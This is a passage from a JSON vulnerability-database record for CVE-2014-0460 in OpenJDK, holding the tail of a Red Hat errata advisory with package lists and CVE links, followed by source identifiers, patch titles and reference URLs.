6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-0429.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0446.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0451.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0452.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0453.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0456.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0457.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0458.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0460.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0461.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-1876.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2397.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2398.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2403.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2412.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2414.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2421.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2423.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2427.html\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFTTm2zXlSAg2UNWIIRAkZ8AJ4tQFSY3KSdfOiDJA5KJWO9IJa1BACeMLJ6\nPQHHIgiQ5K7Q4/GEJAHNU94=\n=9aj6\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n", "sources": [ { "db": "NVD", "id": "CVE-2014-0460" }, { "db": "BID", "id": "66916" }, { "db": "VULHUB", "id": "VHN-67953" }, { "db": "PACKETSTORM", "id": "126611" }, { "db": "PACKETSTORM", "id": "126182" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126664" }, { "db": "PACKETSTORM", "id": "127939" }, { "db": "PACKETSTORM", "id": "126630" }, { "db": "PACKETSTORM", "id": "126183" } ], "trust": 2.07 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0460", "trust": 2.9 }, { "db": "BID", "id": "66916", "trust": 2.0 }, { "db": "SECUNIA", "id": "58415", "trust": 1.7 }, { "db": "SECUNIA", "id": "59307", "trust": 1.7 }, { "db": "SECUNIA", "id": "60117", "trust": 1.7 }, { "db": "SECUNIA", "id": "59082", "trust": 1.7 }, { "db": "SECUNIA", "id": "59255", "trust": 1.7 }, { "db": "SECUNIA", "id": "59706", "trust": 1.7 }, { "db": "SECUNIA", "id": "59071", "trust": 1.7 }, { "db": "SECUNIA", "id": "59642", "trust": 1.7 }, { "db": "SECUNIA", "id": "59250", "trust": 1.7 }, { "db": "SECUNIA", "id": "61264", "trust": 1.7 }, { "db": "SECUNIA", "id": "59023", "trust": 1.7 }, { "db": "SECUNIA", "id": "59704", "trust": 1.7 }, { "db": "SECUNIA", "id": "59058", "trust": 1.7 }, { "db": "SECUNIA", "id": "59022", "trust": 1.7 }, { "db": "SECUNIA", "id": "59516", "trust": 1.7 }, { "db": "SECUNIA", "id": "60003", "trust": 1.7 }, { "db": "SECUNIA", "id": "59436", "trust": 1.7 }, { "db": "SECUNIA", "id": "59705", "trust": 1.7 }, { "db": "SECUNIA", "id": "60111", "trust": 1.7 }, { "db": "JUNIPER", "id": "JSA10698", "trust": 1.7 }, { "db": "CNNVD", "id": "CNNVD-201404-275", "trust": 0.7 }, { "db": "JUNIPER", "id": "JSA10659", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10642", "trust": 0.3 }, { "db": "HITACHI", "id": "HS14-009", "trust": 0.3 }, { "db": "VULHUB", "id": "VHN-67953", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126611", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126182", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130400", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127655", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127938", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126664", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127939", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126630", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126183", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-67953" }, { "db": "BID", "id": "66916" }, { "db": "PACKETSTORM", "id": "126611" }, { "db": "PACKETSTORM", "id": "126182" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126664" }, { "db": "PACKETSTORM", "id": "127939" }, { "db": "PACKETSTORM", "id": "126630" }, { "db": "PACKETSTORM", "id": "126183" }, { "db": "CNNVD", "id": "CNNVD-201404-275" }, { "db": "NVD", "id": "CVE-2014-0460" } ] }, "id": "VAR-201404-0381", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-67953" } ], "trust": 0.01 }, "last_update_date": "2024-07-23T20:52:24.783000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "jdk-7u55-nb-8-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49309" }, { "title": "jre-7u55-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49313" }, { "title": "jdk-8u5-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49317" }, { "title": "jre-7u55-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49312" }, { "title": "jdk-8u5-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49316" }, { "title": "jre-8u5-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49320" }, { "title": "jdk-7u55-nb-8-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49311" }, { "title": "jdk-8u5-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49315" }, { "title": "jre-8u5-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49319" }, { "title": "jdk-7u55-nb-8-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49310" }, { "title": "jre-7u55-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49314" }, { "title": "jre-8u5-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49318" } ], "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-275" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0460" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672080" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674539" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676315" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677294" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681256" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683484" }, { "trust": 2.0, "url": "http://rhn.redhat.com/errata/rhsa-2014-0675.html" }, { "trust": 2.0, "url": "http://rhn.redhat.com/errata/rhsa-2014-0685.html" }, { "trust": 1.8, "url": "http://security.gentoo.org/glsa/glsa-201502-12.xml" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/66916" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673836" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676672" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676746" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679713" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681018" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686717" }, { "trust": 1.7, "url": "http://www.ibm.com/support/docview.wss?uid=swg21675343" }, { "trust": 1.7, "url": "http://www.ibm.com/support/docview.wss?uid=swg21675588" }, { "trust": 1.7, "url": "http://www.ibm.com/support/docview.wss?uid=swg21677387" }, { "trust": 1.7, "url": "http://www.debian.org/security/2014/dsa-2912" }, { "trust": 1.7, "url": "http://security.gentoo.org/glsa/glsa-201406-32.xml" }, { "trust": 1.7, "url": "https://access.redhat.com/errata/rhsa-2014:0413" }, { "trust": 1.7, "url": "https://access.redhat.com/errata/rhsa-2014:0414" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58415" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59022" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59023" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59058" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59071" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59082" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59250" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59255" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59307" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59436" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59516" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59642" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59704" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59705" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59706" }, { "trust": 1.7, "url": "http://secunia.com/advisories/60003" }, { "trust": 1.7, "url": "http://secunia.com/advisories/60111" }, { "trust": 1.7, "url": "http://secunia.com/advisories/60117" }, { "trust": 1.7, "url": "http://secunia.com/advisories/61264" }, { "trust": 1.7, "url": "http://www.ubuntu.com/usn/usn-2187-1" }, { "trust": 1.7, "url": "http://www.ubuntu.com/usn/usn-2191-1" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140852886808946\u0026w=2" }, { "trust": 1.6, "url": "http://marc.info/?l=bugtraq\u0026m=140852974709252\u0026w=2" }, { "trust": 1.6, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10698" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0446" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0429" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2412" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0451" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2398" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0460" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0453" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1876" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2414" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2421" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0457" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0458" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0452" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0461" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2427" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0456" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2403" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-0451.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-0453.html" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6629" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0455" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-2421.html" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0454" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2402" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-2427.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-0446.html" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.5, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.5, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-1876.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-0460.html" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2423" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0459" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2401" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-2412.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-2398.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-0457.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-0429.html" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2397" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0449" }, { "trust": 0.4, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0452.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6954" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-2423.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0461.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2409" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-2414.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0458.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2413" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10642\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10659\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682740" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687642" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687297" }, { "trust": 0.3, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-009/index.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685689" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/java_apr2014_advisory.asc" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/java/index.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680565" }, { "trust": 0.3, "url": "https://www.suse.com/support/update/announcement/2014/suse-su-20140639-1.html" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21685350" }, { "trust": 0.3, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0008.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100180008" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686718" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10659" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678048" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04398943" }, { "trust": 0.3, "url": "\thttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04398922" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675343" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681114" }, { "trust": 0.3, "url": "http://www.ibm.com/developerworks/java/jdk/alerts/#oracle_april_15_2014_cpu" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004969" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv59507" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv59550" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv59555" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676860" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100180257" }, { "trust": 0.3, "url": "asa-2014-203" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686717" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677072" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683527" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678218" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679524" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678544" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020989" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675588" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673013" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672047" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020184" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21679187" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677387" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673576" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678883" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21664899" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21675205" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-6629.html" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2420" }, { "trust": 0.3, "url": "https://www.ibm.com/developerworks/java/jdk/alerts/" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0448" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2401.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2420.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2409.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0449.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-6954.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0459.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0454.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2428.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2428" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0455.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2402.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2397.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0456.html" }, { "trust": 0.2, "url": "https://rhn.redhat.com/errata/rhsa-2014-0406.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2403.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0432" }, { "trust": 0.2, "url": "http://www.hp.com/java" }, { "trust": 0.2, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.2, "url": "https://www.hp.com/go/swa" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10698" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=140852886808946\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=140852974709252\u0026amp;w=2" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0486.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0448.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2413.html" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6562" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0455" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2412" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0454" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2414" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6531" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6493" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6532" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2401" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2409" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4266" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6456" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4219" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4209" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4263" }, { "trust": 0.1, "url": 